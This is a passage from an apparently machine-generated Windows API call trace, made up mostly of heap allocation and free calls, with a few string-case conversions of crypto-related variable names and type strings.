out: hHeap=0x770000) returned 1 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0030.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbbad) returned 0x8c7730 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.412] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.413] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.413] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.414] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.414] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.415] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.416] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.419] CharLowerBuffW (in: lpsz="bool", 